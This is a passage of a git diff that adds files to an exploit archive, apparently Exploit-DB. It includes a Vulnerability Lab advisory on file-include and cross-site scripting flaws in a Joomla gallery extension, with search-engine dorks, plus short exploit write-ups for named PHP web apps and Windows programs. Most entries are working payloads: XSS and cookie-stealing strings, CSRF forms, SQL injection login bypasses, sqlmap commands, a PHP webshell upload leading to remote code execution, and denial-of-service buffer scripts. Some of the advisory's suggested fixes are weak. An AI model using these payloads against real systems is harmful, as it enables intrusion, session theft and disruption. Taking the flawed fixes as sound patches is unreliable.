+gallery with all the extra features (save thumbnails,
+watermark generation, resize original images, etc.) without turbo mode
+lasted approximately 17 seconds. In turbo mode, it only
+took 1 second, and the gallery on the same scale was available! For
+calling the syntaxes, additionally, an Editor Button has
+been programmed. It makes it very easy to choose the required syntax,
+showing all the settings and parameters of the plugin.
+It is a great enrichment in using the SIGE plugin.
+
+(Copy of the Homepage:
+https://kubik-rubik.de/sige-simple-image-gallery-extended )
+(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ;
+https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ;
+https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ )
+
+
+Abstract Advisory Information:
+==============================
+An independent vulnerability laboratory researcher discovered multiple
+web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 &
+v3.5.3 pro extension for joomla.
+
+
+Affected Product(s):
+====================
+Vendor:
+Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro -
+Joomla Extension (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-11-10: Researcher Notification & Coordination (Security Researcher)
+2020-11-11: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Open Authentication (Anonymous Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+1.1
+A file include vulnerability has been discovered in the official Simple
+Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla.
+The web vulnerability allows remote attackers to unauthorized upload
+web-shells or malicious contents to compromise the local file-system.
+
+The vulnerability is located in the img parameter of the print.php file.
+Remote attackers are able to upload images to the unrestricted assets
+path to compromise the web-applications file-system and involved
+database management system. Exploitation requires no user interaction
+and only
+a low privileged user account to upload images.
+
+
+1.2
+Multiple non-persistent cross site web vulnerabilities has been
+discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 &
+v3.5.3 pro extension for joomla.
+The vulnerability allows remote attackers to inject own malicious script
+codes with non-persistent attack vector to compromise browser to
+web-application requests from the client-side.
+
+The non-persistent cross site scripting web vulnerabilities are located
+in the `name` and `title` parameters of the `print.php` file.
+Remote attackers without user or guest privileges are able to make own
+malicious special crafted links to compromise client-side
+GET method requests. The attack vector is non-persistent and the issue
+affects the client-side.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, non-persistent phishing attacks, non-persistent
+external redirects to malicious source and non-persistent client-side
+manipulation of affected application modules.
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The remote file include web vulnerability can be exploited by remote
+attackers without privileged user account or user interaction.
+For security demonstration or to reproduce the persistent cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+Dork(s):
+intext:"Powered by Simple Image Gallery Extended"
+intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
+
+
+PoC: Exploitation
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI
+VULNERABILITY!]&name=[NAME]%20title=[TITLE]
+
+
+1.2
+The non-persistent cross site scripting web vulnerability can be
+exploited by remote attackers without privileged user account and with
+low user interaction.
+For security demonstration or to reproduce the persistent cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+Dork(s):
+intext:"Powered by Simple Image Gallery Extended"
+intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
+
+
+PoC: Payload
+"><svg onload=alert()>
+'><script>alert('');</script>
+<IMG "'"><script>alert()</script>'>
+
+PoC: Example
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE]
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT
+XSS]
+
+
+PoC: Exploitation
+http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php
+?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The remote file include vulnerability issue can be resolved by the
+following steps ...
+
+Example :
+?php
+$files=array('test.gif');
+if(in_array($_GET['file'], $files)){
+include ($_GET['file']);
+}
+?
+* If you are a server administrator, turn off allow_url_fopen from the file
+
+* Or do it with the ini_set command. Only for (RFI)
+?php
+ini_set('allow_url_fopen ', 'Off');
+?
+
+* We can use the strpos command to check that if the address is: //
+http, the file will not be enclosed
+?php
+$strpos = strpos($_GET['url'],'http://');
+if(!$strpos){
+include($_GET['url']);
+}
+?
+
+* Using str_replace we can give the given address from two characters
+"/", "." Let's clean up
+?php
+$url=$_GET['url'];
+$url = str_replace("/", "", $url);
+$url = str_replace(".", "", $url);
+include($url);
+?
+
+
+1.2
+The client-side cross site scripting vulnerabilities can be resolved by
+the following steps ...
+1. Encode and escape as parse the name and title parameters
+2. Filter the input for special chars and disallow them in parameters
+
+
+Security Risk:
+==============
+1.1
+The securit risk of the remote file include vulnerability in the img
+path of the web-application request is estimated as high.
+
+1.2
+The security risk of the non-persistent cross site scripting
+vulnerabilities is estimated as medium.
+
+
+Credits & Authors:
+==================
+h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec
+Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/49180.txt b/exploits/php/webapps/49180.txt
new file mode 100644
index 000000000..5220768ca
--- /dev/null
+++ b/exploits/php/webapps/49180.txt
@@ -0,0 +1,32 @@
+# Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery
+# Exploit Author: Dipak Panchal(th3.d1p4k)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: http://user-registration-login-and-user-management-system-with-admin-panel
+# Version: 5
+# Tested on Windows 10
+
+Attack Vector:
+An attacker can craft HTML page containing POST information to have the
+victim sign into an attacker's account, where the victim can add
+information assuming he/she is logged into the correct account, where in
+reality, the victim is signed into the attacker's account where the changes
+are visible to the attacker.
+
+Exploit:
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/loginsystem/" method="POST">
+      <input type="hidden" name="uemail" value="user1@mail.com" />
+      <input type="hidden" name="password" value="User@1234" />
+      <input type="hidden" name="login" value="LOG&#32;IN" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+Mitigation:
+Please add a csrf token to login request or make some type prompt that the
+session has ended when the new login from attacker occurs.
\ No newline at end of file
diff --git a/exploits/php/webapps/49204.txt b/exploits/php/webapps/49204.txt
new file mode 100644
index 000000000..22d469727
--- /dev/null
+++ b/exploits/php/webapps/49204.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting
+# Date: 04-12-2020
+# Exploit Author: Pruthvi Nekkanti
+# Vendor Homepage: https://phpgurukul.com
+# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
+# Version: 1.0
+# Tested on: Kali Linux
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Admin Username.
+
+Steps-To-Reproduce:
+1. Go to the Product admin panel change the admin username
+2. Put this payload in admin username field:"><script>alert(document.cookie)</script>
+3. Now go to the website and the XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49208.txt b/exploits/php/webapps/49208.txt
new file mode 100644
index 000000000..0a668289d
--- /dev/null
+++ b/exploits/php/webapps/49208.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Savsoft Quiz 5 - 'Skype ID' Stored XSS
+# Exploit Author: Dipak Panchal(th3.d1p4k)
+# Vendor Homepage: https://savsoftquiz.com
+# Software Link: https://github.com/savsofts/savsoftquiz_v5
+# Version: 5
+# Tested on Windows 10
+
+Attack Vector:
+This vulnerability can results attacker to inject the XSS payload in User
+Registration section and each time admin visits the manage user section
+from admin panel, and home page too. XSS triggers and attacker can able to
+steal the cookie according to the crafted payload.
+
+Steps to reproduce:
+1. Create new account and verified it.
+
+2. Navigate to Edit Profile:
+-> http://localhost/savsoftquiz/index.php/user/edit_user/123
+
+3. Put the below Payload in Skype ID field. and submit it.
+Payload: abcd<script>alert("XSS")</script>
+
+4. You will get XSS popup.
\ No newline at end of file
diff --git a/exploits/php/webapps/49209.txt b/exploits/php/webapps/49209.txt
new file mode 100644
index 000000000..06ea8299c
--- /dev/null
+++ b/exploits/php/webapps/49209.txt
@@ -0,0 +1,28 @@
+# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting
+# Date: 05.09.2020
+# Author: Vincent666 ibn Winnie
+# Software Link: https://www.vbulletin.com/en/features/
+# Tested on: Windows 10
+# Web Browser: Mozilla Firefox & Opera
+# Google Dorks: "Powered by vBulletin® Version 5.6.3"
+
+Go to the "Admin CP" - click on "Styles" - click "Style Manager" -
+Choose "Denim" or other theme and choose action "Add new template" and
+click "Go".
+
+Put on the title "1" and template "1" and "Save and Reload". Now you
+can catch the new URL with HTTP Live Headers or with hands.
+
+So..we have Url :
+
+https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0
+
+Test it with hands and get cross site scripting. Use for tests
+different browsers. I use Mozilla Firefox and Opera.
+
+https://localhost/admincp/template.php?templateid=1&group=""><script>alert("Cross
+Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=
+
+Picture:
+
+https://imgur.com/a/b6gH5Fn
\ No newline at end of file
diff --git a/exploits/php/webapps/49212.txt b/exploits/php/webapps/49212.txt
new file mode 100644
index 000000000..1892fc234
--- /dev/null
+++ b/exploits/php/webapps/49212.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Online Bus Ticket Reservation 1.0 - SQL Injection
+# Date: 2020-12-07
+# Exploit Author: Sakshi Sharma
+# Vendor Homepage: https://www.sourcecodester.com/php/5012/online-bus-ticket-reservation-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/busreservation.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: admin page
+
+#Exploit
+	Open the Application
+	check the URL:
+	http://localhost/busreservation/index.php
+	Open Admin Login
+	Enter username: 'or"='
+	Enter password: 'or"='
+	click on login
+The SQL payload gets executed and authorization is bypassed successfully
\ No newline at end of file
diff --git a/exploits/php/webapps/49215.txt b/exploits/php/webapps/49215.txt
new file mode 100644
index 000000000..dba26e9e4
--- /dev/null
+++ b/exploits/php/webapps/49215.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Employee Performance Evaluation System 1.0 - ' Task and Description' Persistent Cross Site Scripting
+# Date: 08/12/2020
+# Exploit Author: Ritesh Gohil
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+Steps to Reproduce:
+1) Login with Admin Credentials and click on 'Task' button.
+2) Click on Add New Task Button.
+3) Now add the following payload input field of Task and Description
+
+Payload:  ritesh"><img src=x onerror=alert(document.domain)>
+
+4) Click On Save
+5) XSS payload is triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49222.txt b/exploits/php/webapps/49222.txt
new file mode 100644
index 000000000..9908c82df
--- /dev/null
+++ b/exploits/php/webapps/49222.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Task Management System 1.0 - 'First Name and Last Name' Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-08
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Click on the logged in username on header and select Manage Account.
+Step 3: Rename the user First Name or Last Name to "
+<script>alert(document.domain)</script> ".
+Step 4: Update Profile and this will trigger the XSS.
+Step 5: Logout and login again and the page will display the domain name.
\ No newline at end of file
diff --git a/exploits/php/webapps/49223.txt b/exploits/php/webapps/49223.txt
new file mode 100644
index 000000000..9c28e79be
--- /dev/null
+++ b/exploits/php/webapps/49223.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-08
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Click on the logged in username on header and select Manage Account.
+Step 3: Upload a php payload ( i used the default php webshell in
+/usr/share/webshells/php/php-reverse-shell.php) or a jpeg image embeded
+with a php payload. ("exiftool -Comment='<?php system($_GET['cmd']); ?>'
+r0b0t.jpg") Then update profile.
+Step 4: Click on username on header again and select Manage Account.
+Step 5: Right click on the uploaded php payload or embeded image located
+under the "choose avatar form" then copy image location.
+Step 6: Start nc listener and paste the url in browser. This will trigger
+the remote code execution if you used a php shell.  (
+http://localhost/assets/uploads/1607438280_shell.php )
\ No newline at end of file
diff --git a/exploits/php/webapps/49224.txt b/exploits/php/webapps/49224.txt
new file mode 100644
index 000000000..7397dd5aa
--- /dev/null
+++ b/exploits/php/webapps/49224.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Task Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-08
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Log into application with credentials
+Step 2. Click on Projects
+Step 3. Select View Projects
+Step 4. Choose any project, click on action and select view
+Step 5. Capture the request of the "page=view_project&id=" page in burpsute
+Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs "
+Step 7. This will inject successfully and you will have an information disclosure of all databases contents
+
+---
+Parameter: id (GET)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: page=view_project&id=3 AND 5169=5169
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: page=view_project&id=3 AND (SELECT 3991 FROM (SELECT(SLEEP(5)))NOXH)
+
+Type: UNION query
+Title: Generic UNION query (NULL) - 9 columns
+Payload: page=view_project&id=-2597 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x5a46784156705a6e654b6a454d44767155796a466f41436c6667585763424b534a4f4c4e52775a45,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL-- -
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49227.txt b/exploits/php/webapps/49227.txt
new file mode 100644
index 000000000..d3a8e7467
--- /dev/null
+++ b/exploits/php/webapps/49227.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Barcodes generator 1.0 - 'name' Stored Cross Site Scripting
+# Date: 10/12/2020
+# Exploit Author: Nikhil Kumar 
+# Vendor Homepage: http://egavilanmedia.com/
+# Software Link: http://egavilanmedia.com/barcodes-generator-using-php-mysql-and-jsbarcode-library/
+# Version: 1.0
+# Tested On: Ubuntu
+
+1. Open the index.php page using following url 
+
+http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
+
+click on the New Barcode
+
+2. Intercept the request through burp suite
+
+Put a payload on "name=" parameter
+
+Payload :- abc"><script>alert("XSS")</script>
+
+Malicious Request::
+
+POST /Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/php/insert.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 6
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
+Upgrade-Insecure-Requests: 1
+
+name=abc"><script>alert("XSS")</script>
\ No newline at end of file
diff --git a/exploits/php/webapps/49228.txt b/exploits/php/webapps/49228.txt
new file mode 100644
index 000000000..bbab819dc
--- /dev/null
+++ b/exploits/php/webapps/49228.txt
@@ -0,0 +1,31 @@
+# Exploit Title: OpenCart 3.0.3.6 - Cross Site Request Forgery
+# Date: 12-11-2020
+# Exploit Author: Mahendra Purbia {Mah3Sec}
+# Vendor Homepage: https://www.opencart.com
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: OpenCart CMS - 3.0.3.6 
+# Tested on: Kali Linux
+
+#Description: 
+This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-list and can make his/her wish-list public which let other users to see the wish-list. Now, as user B there is a button of add to cart , when you click on it that public wish-list will be added in to your cart.
+
+#Additional Information:
+well i found this vulnerability in Opencart based websites but they not respond so i installed a lest version of Opencart CMS and hosted on localhost with help of XAMP and then i exploited that vulnerability.
+Attack Vector:
+1. create two accounts A(attacker) & B(victim)
+2. login with A and add a product in cart and capture that particular request in burpsuite.
+3. Now change the quantity if want and then create a csrf poc of that request.
+4. Save it as .html and send it to victim. Now the product added to victims cart.
+
+#POC: 
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST">
+      <input type="hidden" name="product&#95;id" value="43" />
+      <input type="hidden" name="quantity" value="10000000" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/49230.txt b/exploits/php/webapps/49230.txt
new file mode 100644
index 000000000..cd47d80b2
--- /dev/null
+++ b/exploits/php/webapps/49230.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Library Management System 2.0 - Auth Bypass SQL Injection
+# Date: 2020-12-09
+# Exploit Author: Manish Solanki
+# Vendor Homepage: https://www.sourcecodester.com/php/6849/library-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=6849&title=Library+Management+System+in+PHP%2FMySQLi+with+Source+Code
+# Version: 2.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#Vulnerable Page: admin page
+
+#Exploit
+Open the Application
+check the URL:
+http://localhost/eb_magalona_lms
+
+Open Admin Login
+Enter username: a' or 1=1--
+Enter password: '
+
+click on login
+The SQL payload gets executed and authorization is bypassed successfully
\ No newline at end of file
diff --git a/exploits/php/webapps/49231.txt b/exploits/php/webapps/49231.txt
new file mode 100644
index 000000000..62915cfe6
--- /dev/null
+++ b/exploits/php/webapps/49231.txt
@@ -0,0 +1,73 @@
+# Exploit Title: WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting
+# Date: 11/27/2020
+# Exploit Author: Ilca Lucian Florin
+# Vendor Homepage: https://sygnoos.com
+# Software Link: https://wordpress.org/plugins/popup-builder/ / https://popup-builder.com/
+# Version: <= 3.69.6
+# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge
+
+The Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter
+Plugin is vulnerable to stored cross site scripting. There are multiple
+parameters vulnerable to cross site scripting.
+
+All versions up to 3.69.6 are vulnerable to stored cross site scripting.
+
+More information about this plugin could be found on the following links:
+
+1. https://wordpress.org/plugins/popup-builder/
+2. https://popup-builder.com/
+
+Cross site scripting (XSS) is a common attack vector that injects malicious
+code into a vulnerable web application. XSS differs from other web attack
+vectors (e.g., SQL injections), in that it does not directly target the
+application itself. Instead, the users of the web application are the ones
+at risk. A successful cross site scripting attack can have devastating
+consequences for an online business’s reputation and its relationship with
+its clients. Stored XSS, also known as persistent XSS, is the more damaging
+of the two. It occurs when a malicious script is injected directly into a
+vulnerable web application.
+
+# How to reproduce #
+
+1. Login as Editor or Administrator: https://website.com/wp-login/
+
+2. Go to the following link:
+https://website.com/wp-admin/edit.php?post_type=popupbuilder or search for
+PopUp Builder and select or create new PopUp.
+
+2. Click edit
+
+3. Search and find: # Custom JS or CSS
+
+4. On JS -> Opening events section, add two payloads, one for #2 section
+and one for #3 section, like in the following example:
+
+#2 Add the code you want to run before the popup opens. This will be the
+code that will work in the process of opening the popup. true/false
+conditions will not work in this phase.
+
+<textarea class="wp-editor-area editor-content" data-attr-event="WillOpen"
+placeholder=" #... type your code" mode="text/javascript"
+name="sgpb-WillOpen">"><script
+src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
+
+#3 Add the code you want to run after the popup opens. This code will work
+when the popup is already open on the page.
+
+<textarea class="wp-editor-area editor-content" data-attr-event="DidOpen"
+placeholder=" #... type your code" mode="text/javascript"
+name="sgpb-DidOpen">"><script
+src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
+
+5. Click Update
+
+6. Go to https://website.com. The XSS alert will pop up.
+
+# All text-areas from JS section are vulnerable to stored cross site
+scripting.
+
+Evidence:
+
+1. https://ibb.co/JvBTq0H
+2. https://ibb.co/0KP7NFQ
+3. https://ibb.co/3cFnVYF
\ No newline at end of file
diff --git a/exploits/windows/dos/49206.txt b/exploits/windows/dos/49206.txt
new file mode 100644
index 000000000..178a59860
--- /dev/null
+++ b/exploits/windows/dos/49206.txt
@@ -0,0 +1,30 @@
+# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC)
+# Date: 2020-05-12
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.raimersoft.com/
+# Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+# Version: 2.13.7 x64
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program TapinRadio 
+# In Settings select Preferences option
+# Click in Miscellaneous and click in Set Application Proxy
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Mikon.txt"
+# Paste the content in the field Username and Address and click in OK
+# Click in Ok again
+# After TapinRadio closed, the program did not work again if the user try to open again, so it is necessary uninstall and install again
+# End :)
+
+
+buffer = 'K' * 20000
+
+try: 
+    file = open("Mikon.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/49207.txt b/exploits/windows/dos/49207.txt
new file mode 100644
index 000000000..927ff39a9
--- /dev/null
+++ b/exploits/windows/dos/49207.txt
@@ -0,0 +1,29 @@
+# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC)
+# Date: 2020-05-12
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.raimersoft.com/
+# Software Link: https://www.raimersoft.com/rarmaradio.html
+# Version: 2.75.5
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+#STEPS
+# Open the program TapinRadio 
+# In Edit select Settings option
+# Click in Network
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Paimon.txt"
+# Paste the content in the field Username, Address and Server and click in OK
+# End :)
+
+
+buffer = 'K' * 20000
+
+try: 
+    file = open("Paimon.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/local/49015.txt b/exploits/windows/local/49015.txt
new file mode 100644
index 000000000..32951e2e5
--- /dev/null
+++ b/exploits/windows/local/49015.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path
+# Discovery by: Erika Figueroa
+# Discovery Date: 2020-11-07
+# Vendor Homepage: https://www.realtek.com/en/
+# Tested Version: 1.0.0.55
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 8.1 x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """
+
+Realtek Audio Service                                                   RtkAudioService                     C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe            Auto
+# Service info:
+
+C:\>sc qc "RtkAudioService"
+[[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: RtkAudioService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
+        GRUPO_ORDEN_CARGA  : PlugPlay
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Realtek Audio Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49158.txt b/exploits/windows/local/49158.txt
new file mode 100644
index 000000000..8d2780566
--- /dev/null
+++ b/exploits/windows/local/49158.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path
+# Discovery by: manuel Alvarez
+# Discovery Date: 2020-11-07
+# Vendor Homepage:  https://www.realtek.com/en/
+# Tested Version: 1.0.64.7
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i
+"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i
+/v """
+
+Andrea RT Filters Service
+AERTFilters                         C:\Program Files\IDT\WDM\AESTSr64.exe
+             Auto
+
+# Service info:
+
+C:\Users\ComoDVD>sc qc AESTFilters
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: AESTFilters
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Andrea ST Filters Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49203.txt b/exploits/windows/local/49203.txt
new file mode 100644
index 000000000..53d0928a3
--- /dev/null
+++ b/exploits/windows/local/49203.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
